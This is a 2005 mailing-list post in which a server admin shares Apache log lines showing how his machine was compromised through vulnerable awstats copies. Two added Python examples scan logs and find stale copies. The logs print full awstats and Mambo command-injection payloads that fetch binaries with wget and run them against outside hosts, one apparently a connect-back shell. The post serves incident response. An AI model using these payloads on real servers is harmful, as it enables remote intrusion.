
Re: Am I Compromised -- Some interesting findings



Steve Kemp on Friday 25 Nov 2005 22:27 wrote:

> Looks like it was downloaded via wget.
> 
>   Run "grep wget /var/log/apache/access.log" - that should give you the
>  IP address of the attacking host.
> 
>   It might be worth posting any matching lines; that way somebody might
>  be able to tell you which script (cgi/php/etc) was used as the attack
>  vector.
> 

You were right.

Here's the output.

ns1:/var/log/apache2# grep wget access.log
211.20.11.206 - - [23/Nov/2005:03:51:48 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.20.11.206 - - [23/Nov/2005:03:51:51 -0800]
"GET /cgi-bin/awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.20.11.206 - - [23/Nov/2005:03:51:50 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:47 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:48 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:50 -0800]
"GET /cgi-bin/awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:29 -0800]
"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| 
HTTP/1.1" 404 402 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:31 -0800]
"GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| 
HTTP/1.1" 200 39940 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:32 -0800]
"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| 
HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:33 -0800]
"GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| 
HTTP/1.1" 404 406 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.155.172.142 - - [24/Nov/2005:06:40:06 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.155.172.142 - - [24/Nov/2005:06:40:12 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


So as I understand, "awstats.pl" was the software used to break into the
software. I know that there was a DSA issued against awstats, but I got
delayed in updating my server because the other admin had used the awstats
package in a non-standard way.

He had just copied the awstats.pl file to each VirtualHost folder
individually. So even when I had promptly done the DSA update of awstats,
my server wasn't secure because the VirtualHosts were using a vulnerable
version of awstats.

If my understanding is right, it's a good and bitter lesson to learn.

:-(

Thanks for your input.

Regards,

rrs
-- 
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
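As an added example (not part of the original thread), a small Python scanner for the pattern Steve suggested grepping for: it parses Apache combined-format lines, URL-decodes the request target, flags the download-and-execute markers seen in the requests above, and notes whether the probed script answered 200 rather than 404. The sample lines are constructed on the shape of the grep output and use documentation address ranges.

```python
import re
from urllib.parse import unquote

# Apache combined log format, matching the grep output above (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Download-and-execute markers present in the awstats and Mambo requests above.
INDICATORS = ("wget ", "chmod ", "cd /tmp", ";./", "cmd=")

def decode_target(target):
    """URL-decode until stable, so double-encoded payloads are also unwrapped."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target

def scan_line(line):
    """Return a finding for a suspicious request line, or None if it looks clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [i for i in INDICATORS if i in decoded]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "script": decoded.split("?", 1)[0],
        "status": int(m.group("status")),
        "indicators": hits,
        # A 200 means the probed path existed; the 404s in the log were misses.
        "likely_executed": m.group("status") == "200",
    }

def scan_log(lines):
    return [f for f in map(scan_line, lines) if f]

# Constructed sample lines modelled on the grep output above; 192.0.2.0/24 and
# 203.0.113.0/24 are documentation ranges, not real hosts.
PAYLOAD = ('configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%20203%2e0%2e113%2e5%2flisten'
           '%3bchmod%20%2bx%20listen%3b%2e%2flisten;echo%20YYY;echo|')
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Nov/2005:03:51:48 -0800] "GET /awstats/awstats.pl?' + PAYLOAD
    + ' HTTP/1.1" 404 410 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [23/Nov/2005:03:51:50 -0800] "GET /cgi-bin/awstats.pl?' + PAYLOAD
    + ' HTTP/1.1" 200 770 "-" "Mozilla/4.0"',
    '192.0.2.20 - - [23/Nov/2005:04:00:00 -0800] "GET /cgi-bin/awstats.pl?config=example.com'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]
```

Run `scan_log` over a real access.log and look first at findings with `likely_executed` set; those are the requests that reached an existing script.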
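The lesson about per-VirtualHost copies of awstats.pl suggests a check the thread does not include; this added Python example (not from the original post) walks a directory tree for stray copies of a file and reports those whose hash differs from the packaged copy, which is what a DSA update leaves behind when the file was copied around by hand. The demo builds a constructed directory tree; on a real Debian host the packaged path would come from `dpkg -L awstats` and the root would be `/`.

```python
import hashlib
import os
import tempfile

def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def find_stale_copies(root, filename, packaged_path):
    """Return copies of `filename` under `root` that differ from the packaged copy."""
    reference = sha256_of(packaged_path)
    packaged_real = os.path.realpath(packaged_path)
    stale = []
    for dirpath, _dirs, files in os.walk(root):
        if filename not in files:
            continue
        candidate = os.path.join(dirpath, filename)
        if os.path.realpath(candidate) == packaged_real:
            continue  # the package-managed copy itself
        if sha256_of(candidate) != reference:
            stale.append(candidate)
    return sorted(stale)

def demo():
    """Constructed tree: one packaged awstats.pl plus three hand-copied vhost copies."""
    root = tempfile.mkdtemp()
    packaged = os.path.join(root, "usr", "lib", "cgi-bin", "awstats.pl")
    os.makedirs(os.path.dirname(packaged))
    with open(packaged, "w") as fh:
        fh.write("# awstats.pl (patched, constructed)\n")
    vhosts = {
        "a.example": "# awstats.pl (patched, constructed)\n",         # re-copied after the update
        "b.example": "# awstats.pl (old vulnerable, constructed)\n",  # never updated
        "c.example": "# awstats.pl (old vulnerable, constructed)\n",  # never updated
    }
    for name, body in vhosts.items():
        d = os.path.join(root, "var", "www", name, "cgi-bin")
        os.makedirs(d)
        with open(os.path.join(d, "awstats.pl"), "w") as fh:
            fh.write(body)
    stale = find_stale_copies(root, "awstats.pl", packaged)
    return [os.path.relpath(p, root) for p in stale]
```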